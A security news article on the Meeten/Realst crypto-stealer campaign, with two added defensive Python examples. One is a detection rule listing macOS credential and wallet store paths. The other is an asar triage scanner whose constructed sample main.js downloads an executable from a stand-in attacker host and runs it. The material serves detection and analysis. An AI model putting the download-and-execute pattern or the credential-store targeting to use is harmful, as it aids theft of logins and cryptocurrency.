New Meeten Malware Attacking macOS And Windows Users To Steal Logins


A new scam campaign targeting people who work in Web3 has been observed using fake video-conferencing applications to deliver an information stealer dubbed Realst.

The Realst crypto-stealer campaign has been active for roughly four months and targets both macOS and Windows users.

Posing as a legitimate software company, under names such as “Meetio,” Clusee, Cuesee, Meeten, and Meetone, the attackers use AI-generated content to build convincing websites and social media profiles from which the malware is distributed.

The fake company contacts targets to arrange a video call and asks them to download its meeting application from the website; that download is the Realst information stealer.

Meeten Malware Attacking macOS And Windows Users

Targets have reported that the scam is carried out in several ways. In one documented case, a user received a Telegram message from a friend who wanted to set up a call to discuss a business opportunity.


However, the Telegram account was impersonating one of the target’s contacts.

Even more telling, the scammer sent the target an investment presentation from the target’s own company, which suggests the approach was well researched and planned.

Victims report downloading the program, joining calls about Web3 work, and subsequently having their cryptocurrency stolen.

“After initial contact, the target would be directed to the Meeten website to download the product. In addition to hosting information stealers, the Meeten websites contain JavaScript to steal cryptocurrency that is stored in web browsers, even before installing any malware”, Cado Security Labs said.

Image: the Meeten downloads page (macOS version)

On macOS, the malware iterates through several data stores, extracts sensitive information, writes it to a staging folder, and exfiltrates the collection as a zip archive.

The macOS version of Realst exfiltrates the following:

  • Telegram credentials
  • Banking card details
  • Keychain credentials
  • Browser cookies and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi
  • Ledger Wallets
  • Trezor Wallets
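As an added example (not code from Cado Security Labs or from the article), here is the kind of behavioural rule a defender could run over endpoint file-access telemetry to catch the sequence just described: one process touching several unrelated credential stores it does not own and then writing a zip archive. The event format, process names, user paths and file names are constructed for the demonstration; the store locations are the usual macOS paths for each product and are assumptions rather than indicators taken from the Realst samples, and they cover only some of the browsers listed above.

```python
"""Behavioural detection for a stealer that sweeps many credential stores and
then zips the loot, run here over constructed file-access events.

Added example for this article, not code from Cado Security Labs. The event
format, process names, user paths and file names are constructed; the store
locations are the usual macOS paths for each product and are assumptions,
not indicators taken from the Realst samples.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

APP_SUPPORT = r"/Library/Application Support/"

# Sensitive stores, grouped so that Chrome's Cookies and Login Data count as
# one category ("chromium") rather than two.
STORE_PATTERNS: Dict[str, re.Pattern] = {
    "chromium": re.compile(APP_SUPPORT + r"(?:Google/Chrome|BraveSoftware/Brave-Browser|Microsoft Edge|Arc)/"
                           r"(?:.*/)?(?:Cookies|Login Data|Web Data)$"),
    "keychain": re.compile(r"/Library/Keychains/[^/]+\.keychain-db$"),
    "telegram": re.compile(APP_SUPPORT + r"Telegram Desktop/tdata(?:/|$)"),
    "ledger":   re.compile(APP_SUPPORT + r"Ledger Live(?:/|$)"),
    "trezor":   re.compile(APP_SUPPORT + r"@trezor/suite-desktop(?:/|$)"),
}

# Processes that legitimately own a store; an app reading its own profile is not theft.
OWNER_OF: Dict[str, Set[str]] = {
    "chromium": {"Google Chrome", "Brave Browser", "Microsoft Edge", "Arc"},
    "keychain": {"securityd"},
    "telegram": {"Telegram"},
    "ledger": {"Ledger Live"},
    "trezor": {"Trezor Suite"},
}

# Constructed event format, modelled on what an EDR or fs_usage-style sensor emits.
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) proc="(?P<proc>[^"]+)" op=(?P<op>\w+) path="(?P<path>[^"]+)"$'
)


def detect(events: List[str], min_categories: int = 3) -> List[Dict]:
    """Alert when one process reads >= min_categories distinct store categories
    it does not own and then creates or writes a .zip archive."""
    touched: Dict[int, Set[str]] = defaultdict(set)
    alerts: List[Dict] = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue  # tolerate unparseable lines rather than dropping the batch
        pid, proc, op, path = int(m["pid"]), m["proc"], m["op"], m["path"]
        for category, pattern in STORE_PATTERNS.items():
            if pattern.search(path) and proc not in OWNER_OF[category]:
                touched[pid].add(category)
        if (op in ("create", "write") and path.lower().endswith(".zip")
                and len(touched[pid]) >= min_categories):
            alerts.append({"ts": m["ts"], "pid": pid, "proc": proc,
                           "stores": sorted(touched[pid]), "archive": path})
    return alerts


SAMPLE_EVENTS = [  # constructed: two benign owners, one stealer, one backup tool below threshold
    '2024-12-05T10:00:01Z pid=812 proc="Google Chrome" op=open path="/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"',
    '2024-12-05T10:00:02Z pid=905 proc="Telegram" op=open path="/Users/alice/Library/Application Support/Telegram Desktop/tdata/key_datas"',
    '2024-12-05T10:02:10Z pid=4242 proc="MeetingApp" op=mkdir path="/private/tmp/.sync_4242"',
    '2024-12-05T10:02:11Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"',
    '2024-12-05T10:02:11Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"',
    '2024-12-05T10:02:12Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/BraveSoftware/Brave-Browser/Default/Cookies"',
    '2024-12-05T10:02:12Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Keychains/login.keychain-db"',
    '2024-12-05T10:02:13Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/Telegram Desktop/tdata/key_datas"',
    '2024-12-05T10:02:13Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/Ledger Live/app.json"',
    '2024-12-05T10:02:14Z pid=4242 proc="MeetingApp" op=open path="/Users/alice/Library/Application Support/@trezor/suite-desktop/config.json"',
    '2024-12-05T10:02:20Z pid=4242 proc="MeetingApp" op=create path="/private/tmp/.sync_4242/out.zip"',
    '2024-12-05T10:05:00Z pid=990 proc="backupd" op=open path="/Users/alice/Library/Keychains/login.keychain-db"',
    '2024-12-05T10:05:01Z pid=990 proc="backupd" op=open path="/Users/alice/Library/Application Support/Ledger Live/app.json"',
    '2024-12-05T10:05:09Z pid=990 proc="backupd" op=create path="/Volumes/Backup/2024-12-05.zip"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["ts"]} pid={alert["pid"]} {alert["proc"]} staged {alert["stores"]} into {alert["archive"]}')
```

Keying on the sequence rather than on any single path is what keeps a rule like this useful when the stealer is rebuilt: file names and domains change, but the malware still has to read the same stores and package them. A production version would add a time window between the first store read and the archive write, and would identify the process by its code-signing identity rather than its display name, since the name is attacker-controlled.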

The researchers also analysed the Windows version. The binary “MeetenApp.exe” is a Nullsoft Scriptable Install System (NSIS) installer carrying a valid signature from “Brys Software”, a certificate that was most likely stolen. A valid Authenticode signature only proves the file was signed with that certificate’s private key; it does not prove the signer is the product’s real publisher, so a signer name unrelated to the product is itself a warning sign.

Image: the digital signature on the Meeten installer

The installer drops an Electron application that is configured to retrieve the stealer itself, a Rust-based executable, from an attacker-controlled domain.
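As an added example (not the project’s code and not from Cado Security Labs), the following Python triages a suspicious Electron bundle offline in the way an analyst would check a downloader like the one described above: it unpacks app.asar without Node, following the public asar layout, and flags JavaScript that contacts a host outside an allowlist or that downloads, writes and then executes a binary. The sample bundle, its hostnames (under the reserved .invalid TLD) and the allowlist are constructed for the demonstration.

```python
"""Offline triage of an Electron bundle: unpack app.asar without Node and flag
JavaScript that pulls a binary from a remote host and then executes it.

Added example for this article, not code from Cado Security Labs or from the
Meeten/Realst samples. The reader follows the public asar layout (uint32 4,
uint32 header size, pickled JSON header, then file bytes); the sample bundle,
its hostnames (reserved .invalid TLD) and the allowlist are constructed.
"""
import json
import re
import struct
from typing import Dict, Iterator, List, Set, Tuple
from urllib.parse import urlparse


def parse_asar(blob: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield (path, contents) for every file packed inside an asar archive."""
    _four, header_size = struct.unpack_from("<II", blob, 0)      # 4, size of header pickle
    _pickle_len, json_len = struct.unpack_from("<II", blob, 8)   # pickle payload, string length
    header = json.loads(blob[16:16 + json_len].decode("utf-8"))
    base = 8 + header_size  # file data starts right after the header pickle

    def walk(node: Dict, prefix: str) -> Iterator[Tuple[str, bytes]]:
        for name, entry in node.get("files", {}).items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:            # directory
                yield from walk(entry, path)
            elif "offset" in entry:         # packed file; offset is a decimal string
                start = base + int(entry["offset"])
                yield path, blob[start:start + entry["size"]]
    yield from walk(header, "")


def build_asar(files: Dict[str, bytes]) -> bytes:
    """Pack {path: bytes} into an asar archive; used here only to build the sample."""
    root: Dict = {"files": {}}
    data = b""
    for path, content in files.items():
        node = root
        *dirs, leaf = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][leaf] = {"size": len(content), "offset": str(len(data))}
        data += content
    hdr = json.dumps(root).encode("utf-8")
    pickle = struct.pack("<I", len(hdr)) + hdr + b"\0" * (-len(hdr) % 4)
    pickle = struct.pack("<I", len(pickle)) + pickle
    return struct.pack("<II", 4, len(pickle)) + pickle + data


# Heuristics for a main process that fetches a payload, writes it and runs it.
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")
DOWNLOAD_RE = re.compile(r"\b(?:fetch|https?\.(?:get|request)|net\.request|axios\.get)\s*\(")
WRITE_RE = re.compile(r"\bfs\.(?:writeFile(?:Sync)?|createWriteStream)\s*\(")
EXEC_RE = re.compile(r"\b(?:execFile(?:Sync)?|spawn(?:Sync)?|exec(?:Sync)?|shell\.openPath)\s*\(")
BINARY_RE = re.compile(r"""['"`][^'"`]*\.(?:exe|dll|dmg|pkg|bin|dylib)['"`]""", re.I)


def scan_js(source: str, allowed_hosts: Set[str]) -> List[str]:
    """Return findings for one JavaScript source; an empty list means nothing suspicious."""
    findings: List[str] = []
    hosts = {urlparse(u).hostname for u in URL_RE.findall(source)}
    for host in sorted(h for h in hosts if h and h not in allowed_hosts):
        findings.append(f"contacts non-allowlisted host {host}")
    if DOWNLOAD_RE.search(source) and WRITE_RE.search(source) and EXEC_RE.search(source):
        findings.append("download -> write to disk -> execute chain")
    if BINARY_RE.search(source) and EXEC_RE.search(source):
        findings.append("references and executes a native binary")
    return findings


def triage_asar(blob: bytes, allowed_hosts: Set[str]) -> Dict[str, List[str]]:
    """Scan every JavaScript file in the archive; return {path: findings} for hits only."""
    report: Dict[str, List[str]] = {}
    for path, content in parse_asar(blob):
        if path.endswith((".js", ".mjs", ".cjs")):
            hits = scan_js(content.decode("utf-8", "replace"), allowed_hosts)
            if hits:
                report[path] = hits
    return report


# Constructed sample: a benign renderer plus a main process that downloads and runs a second stage.
SAMPLE_ASAR = build_asar({
    "package.json": b'{"name": "meeting-app", "main": "main.js"}',
    "renderer/app.js": b"fetch('https://api.meeting-app.invalid/rooms').then(r => r.json());\n",
    "main.js": (
        b"const https = require('https'); const fs = require('fs');\n"
        b"const { execFile } = require('child_process');\n"
        b"const dest = require('path').join(require('os').tmpdir(), 'UpdateMC.exe');\n"
        b"https.get('https://updates.attacker-demo.invalid/UpdateMC.exe', res => {\n"
        b"  res.pipe(fs.createWriteStream(dest)).on('finish', () => execFile(dest));\n"
        b"});\n"
    ),
})
ALLOWED_HOSTS = {"api.meeting-app.invalid"}  # hosts the product is expected to contact


def demo_report() -> Dict[str, List[str]]:
    """Triage the constructed bundle; only main.js should come back with findings."""
    return triage_asar(SAMPLE_ASAR, ALLOWED_HOSTS)
```

Running triage_asar over a real bundle’s app.asar (typically under Contents/Resources/ on macOS or resources/ on Windows) answers the question an analyst has before executing anything: does the main process fetch and run code that is not in the package? Legitimate auto-updaters also download and execute, so the allowlist of expected hosts is what separates a signed vendor update from a second stage pulled from an attacker’s domain.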

That Rust binary, UpdateMC.exe, behaves like the macOS version: it searches multiple data stores, collects sensitive data, and exfiltrates it as a zip archive.

The Windows version steals:

  • Telegram credentials
  • Banking card details
  • Browser cookies, history and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi
  • Ledger Wallets
  • Trezor Wallets
  • Phantom Wallets
  • Binance Wallets

As Electron apps become more common, users should verify the source of anything they install, enforce strict security controls, and monitor for unusual activity.

Users should be wary of unsolicited business offers, particularly over Telegram. Confirm the account’s identity through another channel before acting, and be cautious about clicking links, even when the message appears to come from a known contact.
